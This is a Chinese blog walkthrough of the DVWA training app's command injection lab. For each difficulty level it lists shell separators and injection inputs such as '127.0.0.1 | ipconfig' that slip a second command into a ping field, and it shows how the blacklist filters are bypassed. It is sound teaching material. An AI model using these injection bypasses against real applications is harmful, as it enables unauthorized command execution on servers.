首页 > 其他分享 >DVWA-Command Injection通关教程-完结

DVWA-Command Injection通关教程-完结

时间:2024-03-28 15:32:22浏览次数:30  
标签:127.0 0.1 ipconfig DVWA 源码 Command && Injection 执行

DVWA-Command Injection通关教程

文章目录

Low

打开靶场,发现这是一个可以输入ip,测试连通性的界面
在这里插入图片描述
源码分析
这里直接将target变量放入shell_exec()执行ping命令,没有进行任何过滤,用户端可以直接拼接特定的命令,来执行并获取想要的信息。
在这里插入图片描述
漏洞利用

A; B //A不论正确与否都会执行B
A&B //A后台运行,A和B同时执行
A&&B //A执行成功后才会执行B
A|B //A执行的输出结果作为B命令的参数,A不论正确与否,都会执行B
A||B //A执行失败后才会执行B命令

可以执行的有:
127.0.0.1 & ipconfig
127.0.0.1 && ipconfig
127.0.0.1 | ipconfig
111 || ipconfig

在这里插入图片描述

Medium

源码分析
设置了黑名单过滤规则,但是只过滤了两种字符'&&' ';'
在这里插入图片描述

漏洞利用
只要不使用&&;即可绕过

127.0.0.1 & ipconfig
127.0.0.1 | ipconfig
111 || ipconfig
在这里插入图片描述

High

源码分析
看上去,似乎敏感的字符都被过滤了,但是 | 明显后面有个空格,所以如果不使用空格的话依然可以绕过
在这里插入图片描述

漏洞利用

127.0.0.1 |ipconfig
在这里插入图片描述

Impossible

源码分析:
这里加入了Anti-CSRF token,同时对参数ip进行了严格的限制,只有诸如“数字.数字.数字.数字”的输入才会被接收执行

在这里插入图片描述

标签:127.0,0.1,ipconfig,DVWA,源码,Command,&&,Injection,执行
From: https://blog.csdn.net/qq_39848882/article/details/137036728

相关文章

  • DVWA-CSRF通关教程-完结
    DVWA-CSRF通关教程-完结文章目录DVWA-CSRF通关教程-完结Low页面使用源码分析漏洞利用Medium源码分析漏洞利用High源码分析漏洞利用impossible源码分析Low页面使用当前页面上,是一个修改admin密码的页面,只需要输入新密码和重复新密码,即可修改admin密码。源码......
  • 【平台开发】MTK6833——add harware command queue function in lk
    CQE实现主要步骤(参考协议)Hostsystem结构commandqueue任务结构:2.TheoryofOperation(操作理论)init(初始化)初始化,enableCQ配置CQCFGTaskDescriptorsize配置CQTDLBA(CommandQueuingTaskDescriptorListBaseAddress)和CQTDLBAU(CommandQueuingTaskDe......
  • CommandBuffer使用1
    是用来干嘛的?在渲染的某个步骤,插入额外的渲染处理。比如:在渲染不透明物体前,渲染一个正方体;在渲染不透明物体后,渲染一个球体。CommandBuffer支持的可插入点还是很多的,加在Camera上时,支持的可插入点在CameraEvent枚举上;加在Light上时,支持的可插入点在LightEvent枚举上。 和G......
  • 搭建hive环境,并解决后启动hive命令报 hive: command not found的问题
    一、问题解决 1、问题复现2、解决问题        查阅资料得知该问题大部分是环境变量配置出了问题,我就输入以下命令进入配置文件检查自己的环境变量配置:[root@node03~]#vi/etc/profile        检查发现自己的hive配置没有问题 ,于是我就退出,然后更新......
  • Postgresql Common Commands
    PSQL快捷命令cat~/.psqlrc--checkactivesession\setactive_session'selectpid,usename,datname,application_name,client_addr,age(clock_timestamp(),query_start),queryfrompg_stat_activitywherepid<>pg_backend_pid()andstate=\'active\......
  • C#设计模式——命令模式(Command Pattern)
    命令模式命令模式将一个请求封装为一个对象,从而使你可用不同的请求对客户进行参数化;对请求排队或记录请求日志,以及支持可撤销的操作。示例假定要实现一个绘图系统,要求支持撤销功能,下面就用命令模式来实现这一需求。首先定义一个抽象的命令接口publicinterfaceIGraphCommand......
  • MVVM中ICommand的具体使用
    本节使用MVVM模式进行演示MyCommand为自定义的命令类,代码如下:publicclassMyComand:ICommand{privatereadonlyAction<object>_action;privatereadonlyFunc<object,bool>?_func;publicMyComand(Action<object>action,Func<object,bool>......
  • ICommand的实现(1)
    ICommand接口在System.Windows.Input命名空间内定义。它有两个方法和一个事件。////摘要://Occurswhenchangesoccurthataffectwhetherornotthecommandshouldexecute.eventEventHandler?CanExecuteChanged;////摘要://......
  • WPF MVVM模式ListBox下ContextMenu绑定Command的方法以及将所选的Item的数据传回去
    需求:ListBoxItem上右键,将数据传参。疑问:ContextMenu不继承DataContext,导致直接用RelativeSource找根的方式也绑定不到。解决方法:在ListBox.ContextMenu里写菜单,就可以直接绑定到ViewModel层的命令了,参数先用RelativeSource找到ContextMenu,再绑定PlacementTarget.SelectedItem。......
  • 【小猪学渗透】打靶第2天:DVWA入门:暴力破解、命令注入、文件上传
    暴力破解low题目界面如上先抓个包试试,发送到intruder可以看到用GET数据包传输,username和password都是直接写在了url上在password后面的数字上加上$123$这样好进行替换。报错,没有加载字典,在知乎上找到了一篇文章讲字典的找到了一个老的字典库开始攻击,发现......